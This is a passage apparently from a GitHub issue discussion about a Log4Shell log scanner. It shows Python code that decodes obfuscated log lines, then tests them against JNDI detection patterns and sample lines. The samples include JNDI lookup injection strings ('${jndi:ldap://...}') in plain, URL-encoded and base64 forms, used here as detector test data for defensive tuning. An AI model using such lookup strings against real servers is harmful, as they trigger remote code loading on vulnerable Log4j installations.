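        return decoded if decoded.isprintable() else match.group(0)
    return BASE64_LOOKUP.sub(_replace, line)


def deobfuscate(line):
    """URL-decode (the README's decoder) and then resolve base64 lookups."""
    return decode_base64_lookups(urllib.parse.unquote(line))


def scan_line(line, max_distance=40, decode=True):
    """Return the pads found in one log line; max_distance plays the role of -d."""
    text = deobfuscate(line) if decode else line
    hits = []
    for pad in DETECTION_PADS:
        found = pad_match(text, pad, max_distance)
        if found:
            hits.append(found)
    return hits


# Constructed sample lines (not real logs). The last one is the templates.dat
# line quoted in the first issue: an installer translation string that the
# character walk flags because "$", "{", "j", "n", "d", "i", ":" ... occur in order.
SAMPLES = {
    "plain": "${jndi:ldap://example.invalid/x}",
    "urlencoded": "%24%7Bjndi%3Aldap%3A%2F%2Fexample.invalid%2Fx%7D",
    "base64": "${base64:JHtqbmRpOmxkYXA6}//example.invalid/x",
    "templates_dat": (
        "Extended_description-ku.UTF-8: Cîhaza ku hatiye hilbijartin partîsiyonên ji bo "
        "cîhazên RAiD dihundirîne. Ew cîhaz û partîsiyon dê werin rakirin:\\n\\nCîhaza "
        "Software RAID li bêr rakirinê ye: ${REMOVED_DEVICES}\\n\\nPartition ji hêla van "
        "cîhazên RAID ve hat bikaranîn: ${REMOVED_PARTITIONS}\\n\\nNîşe: Her wisa evê her "
        "tim hemû daneyên li ser cîhazên RAID yên nivîsbarî jê bibe."
    ),
}

if __name__ == "__main__":
    for name, line in SAMPLES.items():
        print(f"{name:14s} raw={scan_line(line, decode=False)} "
              f"decoded={scan_line(line)} d=10: {scan_line(line, max_distance=10)}")
```

Running it shows the trade-off both issues describe: the base64 sample is invisible to the raw walk and only fires once the lookup is decoded, while the templates.dat line fires for the dns and rmi pads at a distance of 40 (the same two the tool reported for line 65224) and goes quiet at a distance of 10, which would also weaken detection of spread-out obfuscation. A complementary filter that costs no detection is the one the first issue hints at: skip files whose modification time predates the vulnerability disclosure, as the `--quick` time-stamp check does for individual lines.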
Owner
Florian Roth